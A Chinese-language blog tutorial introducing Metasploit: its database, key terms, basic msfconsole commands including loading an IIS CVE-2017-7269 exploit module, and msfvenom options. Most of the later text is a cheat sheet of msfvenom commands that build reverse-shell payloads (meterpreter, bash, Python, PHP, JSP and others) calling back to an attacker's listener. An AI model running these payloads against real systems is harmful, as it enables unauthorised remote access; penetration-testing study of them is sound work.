msf系列篇章之msf的基础模块和命令,和黑客并肩作战

  • 时间:2025-11-11 20:42 作者: 来源: 阅读:0
  • 扫一扫,手机访问
摘要:1、 msf的基础介绍kali是默认集成了mepasploit framework,简称为msf,不同的框架下,它有不同的模块,不同的模块之间,相互交流彼此生产输入输出的数据,第一个模块生成的数据可以给第二个或者第三个模块去直接拿来使用,缘由是它拿来使用的是后台有数据库,其它的版本后面也有数据库,列如说我们扫描的目标系统,扫描下来的信息,列如说开放了哪些端口,哪些信息,都会存到数据库里面,而mea

1、 msf的基础介绍

kali是默认集成了mepasploit framework,简称为msf,不同的框架下,它有不同的模块,不同的模块之间,相互交流彼此生产输入输出的数据,第一个模块生成的数据可以给第二个或者第三个模块去直接拿来使用,缘由是它拿来使用的是后台有数据库,其它的版本后面也有数据库,列如说我们扫描的目标系统,扫描下来的信息,列如说开放了哪些端口,哪些信息,都会存到数据库里面,而measploit framework用的是postgresql数据库来进行存储。

早期的msf版本需要先启动数据库再启动msf

2)msf的基本机构

msf系列篇章之msf的基础模块和命令,和黑客并肩作战


3)、msf的基础操作和命令

在这里的话,我们打开kali的终端,输入msfconsole打开msf的界面,由于kali系统是自带的msf工具,执行命令之后,它这里会进行一个初始化,接着就可以看见msf的命令行界面

msf系列篇章之msf的基础模块和命令,和黑客并肩作战


4)msf中专业术语,由于在msf中,这些都是常见的专业术语,也是必要的

– Exploit,攻击工具/代码

– Payload,攻击载荷

– Shellcode

– Module,模块

– Listener,监听器

5)、常用命令

showpayloads (show 可以理解为显示的意思), 查看所有可用的渗透攻击程序代码


msf系列篇章之msf的基础模块和命令,和黑客并肩作战


show auxiliary – 查看所有可用的辅助攻击工具,然后就可以看见显示出相对应的辅助工具


msf系列篇章之msf的基础模块和命令,和黑客并肩作战


Use exploist/windows/iis/cve_2017_7269 进入相对应的模块,列如说我进入了cve_2017_7269漏洞模块,接着就可以看见它这里进入了


msf系列篇章之msf的基础模块和命令,和黑客并肩作战


show options – 查看该模块所有可用选项,列如说我们进入cve_2017_7269漏洞模块,执行攻击的话,需要配置该模块的一些选项


msf系列篇章之msf的基础模块和命令,和黑客并肩作战


show payloads – 查看该模块适用的所有载荷代码,然后就可以显示出相对应的payload


msf系列篇章之msf的基础模块和命令,和黑客并肩作战


show targets – 查看该模块适用的攻击目标类型

search ssh - 根据关键字搜索某模块,列如说我搜索ssh相对应的漏洞模块,就可以看见显示出相对应的ssh关键词的模块


msf系列篇章之msf的基础模块和命令,和黑客并肩作战


info – 显示某模块的详细信息


msf系列篇章之msf的基础模块和命令,和黑客并肩作战


bach –退出当前进行的模块


msf系列篇章之msf的基础模块和命令,和黑客并肩作战


6)msfvenom (攻击载荷生成和编码器)

主要参数:


-p payload


-e 编码方式


-i 编码次数


-b 在生成的程序中避免出现的值


LHOST,LPORT 监听上线的主机IP和端口


-f exe 生成EXE格式


使用msfvenom -l 可以查看可以利用payload


msfvenom -l | grep windows | grep x64 | grep tcp 选择payload

7)、在Linux命令下,执行msf命令生成可执行的文件,这些文件用来反弹shell用于提权,各种可执行的脚本命令如下。

Linux:


msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf


Windows:


msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe


Mac:


msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho


PHP:


msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php


cat shell.php | pbcopy && echo '<?php ' | tr -d ' ' > shell.php && pbpaste >> shell.php


ASP:


msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp


JSP:


msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp


WAR:


msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war


Python:


msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py


Bash:


msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh


Perl:


msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

最后喜爱我文章的朋友请加圈子关注我们,私信关键词:学习。(送免费资料和代金券)

就会自动分享给你微信号。欢迎大家加入我们的安全大家庭。提高大家的安全意识,提升大家的网络安全技能一直是我们的初衷和愿景,让我们共同成为守护信息世界的"SaFeMAN"。

还有可以关注我们微信公众号,在公众号上输入安界网,就可以关注到我们,领取资料和代金券

  • 全部评论(0)
最新发布的资讯信息
【系统环境|】最低 2 美元,这 55 款 macOS & Windows 应用一次全都入手(2025-11-11 22:01)
【系统环境|】SCI期刊对论文图片有哪些要求?(2025-11-11 22:00)
【系统环境|】论文缩写大全,拿走不谢(2025-11-11 22:00)
【系统环境|】阿甘正传高频词整理 GRE托福四六级词汇整理(2025-11-11 21:59)
【系统环境|】矢量图形编辑应用程序-WinFIG(2025-11-11 21:59)
【系统环境|】Figma上市首日暴涨250%的深层逻辑:为什么AI时代协作平台更加不可替代?(2025-11-11 21:58)
【系统环境|】FigJam是什么?一文读懂在线白板软件的方方面面!(2025-11-11 21:58)
【系统环境|】在windows上有什么好用的书写白板软件?(2025-11-11 21:57)
【系统环境|】Docker基础应用之nginx(2025-11-11 21:57)
【系统环境|】VS Code 新手必装插件清单(2025-11-11 21:56)
手机二维码手机访问领取大礼包
返回顶部